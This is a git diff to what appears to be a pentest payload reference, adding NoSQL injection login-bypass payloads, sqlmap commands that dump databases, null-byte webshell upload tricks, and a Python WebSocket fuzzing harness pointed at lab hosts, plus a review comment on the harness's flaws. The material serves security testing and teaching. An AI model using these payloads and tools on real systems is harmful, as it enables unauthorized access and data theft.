diff --git a/NoSQL injection/README.md b/NoSQL injection/README.md index 811cd3b..e87a921 100644 --- a/NoSQL injection/README.md +++ b/NoSQL injection/README.md @@ -11,9 +11,10 @@ in URL username[$ne]=toto&password[$ne]=toto in JSON -{"username": {"$ne": null}, "password": {"$ne": null} } -{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} } -{"username": {"$gt": undefined}, "password": {"$gt": undefined} } +{"username": {"$ne": null}, "password": {"$ne": null}} +{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}} +{"username": {"$gt": undefined}, "password": {"$gt": undefined}} +{"username": {"$gt":""}, "password": {"$gt":""}} ``` Extract length information @@ -40,6 +41,13 @@ in JSON {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }} ``` +Extract data with "in" + +````json +{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} +``` + + ## Blind NoSQL ```python diff --git a/SQL injection/README.md b/SQL injection/README.md index 3a1b845..5fe5773 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -117,6 +117,12 @@ transformed into U+0027 APOSTROPHE (') sqlmap --url="" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs ``` +### Load a request file and use mobile user-agent + +```powershell +sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1 +``` + ### Custom injection in UserAgent/Header/Referer/Cookie ```powershell diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md index 809fba8..7ca53b1 100644 --- a/Upload insecure files/README.md +++ b/Upload insecure files/README.md 
@@ -31,7 +31,7 @@ Double extensions ### Upload tricks -- Null byte (eg: shell.php%00.gif, shell.php%00.png) +- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()` - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` ### Picture upload with LFI diff --git a/Web Sockets/Files/ws-harness.py b/Web Sockets/Files/ws-harness.py new file mode 100644 index 0000000..7e3a2f6 --- /dev/null +++ b/Web Sockets/Files/ws-harness.py 
@@ -0,0 +1,63 @@
+#!/usr/bin/python
+import socket,ssl
+from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
+from websocket import create_connection, WebSocket
+from urlparse import parse_qs
+import argparse
+import os
+
+LOOP_BACK_PORT_NUMBER = 8000
+
+def FuzzWebSocket(fuzz_value):
+ print fuzz_value
+ ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
+ result = ws.recv()
+ return result
+
+def LoadMessage(file):
+ file_contents = ""
+ try:
+ if os.path.isfile(file):
+ f = open(file,'r')
+ file_contents = f.read()
+ f.close()
+ except:
+ print ("Error reading file: %s" % file)
+ exit()
+ return file_contents
+
+class myWebServer(BaseHTTPRequestHandler):
+
+ #Handler for the GET requests
+ def do_GET(self):
+ qs = parse_qs(self.path[2:])
+ fuzz_value = qs['fuzz']
+ result = FuzzWebSocket(fuzz_value)
+ self.send_response(200)
+ self.send_header('Content-type','text/html')
+ self.end_headers()
+ self.wfile.write(result)
+ return
+
+parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
+parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
+parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
+args = parser.parse_args()
+
+ws_message = LoadMessage(args.message)
+
+ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)
+
+try:
+ #Create a web server and define the handler to manage the
+ #incoming request
+ server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
+ print 'Started httpserver on port ' , LOOP_BACK_PORT_NUMBER
+
+ #Wait forever for incoming http requests
+ server.serve_forever()
+
+except KeyboardInterrupt:
+ print '^C received, shutting down the web server'
+ server.socket.close()
+ ws.close()
\ No newline at end of file
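Review bot: `server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)` binds to every interface despite the constant's name, so any host that can reach port 8000 can push arbitrary payloads through the tester's WebSocket session (which carries whatever credentials are baked into the message template); bind to loopback instead, `server = HTTPServer(('127.0.0.1', LOOP_BACK_PORT_NUMBER), myWebServer)`, which is also the address the README tells sqlmap to use. In `do_GET`, `qs['fuzz']` raises KeyError on any request without that parameter and `self.path[2:]` only parses correctly when the path is exactly `/?...`; `fuzz_value = parse_qs(urlparse(self.path).query).get('fuzz', [''])` (importing `urlparse` from the same module) handles both, and a missing value should answer 400 rather than let the handler traceback. `LoadMessage` returns an empty template when the file does not exist and its bare `except:` hides the real error, so a wrong `-m` path silently sends empty frames with no `[FUZZ]` in them; drop the `isfile` check and let the `IOError` surface with the filename. The harness also does exactly one `recv()` per `send()` on a single global connection and never reconnects, so a server that closes the socket after a failed login will presumably make every later request fail — worth a header comment at minimum, or a reconnect on error in `FuzzWebSocket`. Since the script is Python 2 only (print statements, `BaseHTTPServer`, `urlparse`), the shebang should say `#!/usr/bin/python2` or the README should state the requirement.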
diff --git a/Web Sockets/Images/WebsocketHarness.jpg b/Web Sockets/Images/WebsocketHarness.jpg
new file mode 100644
index 0000000..2657d6e
Binary files /dev/null and b/Web Sockets/Images/WebsocketHarness.jpg differ
diff --git a/Web Sockets/Images/sqlmap.png b/Web Sockets/Images/sqlmap.png
new file mode 100644
index 0000000..12b888c
Binary files /dev/null and b/Web Sockets/Images/sqlmap.png differ
diff --git a/Web Sockets/Images/websocket-harness-start.png b/Web Sockets/Images/websocket-harness-start.png
new file mode 100644
index 0000000..22c0081
Binary files /dev/null and b/Web Sockets/Images/websocket-harness-start.png differ
diff --git a/Web Sockets/README.md b/Web Sockets/README.md
new file mode 100644
index 0000000..088c476
--- /dev/null
+++ b/Web Sockets/README.md
@@ -0,0 +1,37 @@
+# Web Sockets Attacks
+
+> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
+
+Tools:
+
+- [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
+
+## Summary
+
+* [Using ws-harness.py](#using-ws-harness-py)
+
+## Using ws-harness.py
+
+Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
+
+```powershell
+python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
+```
+
+The content of the message should contains the **[FUZZ]** keyword.
+
+```json
+{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
+```
+
+Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
+
+```python
+sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
+```
+
+
+## References
+
+- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
+- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)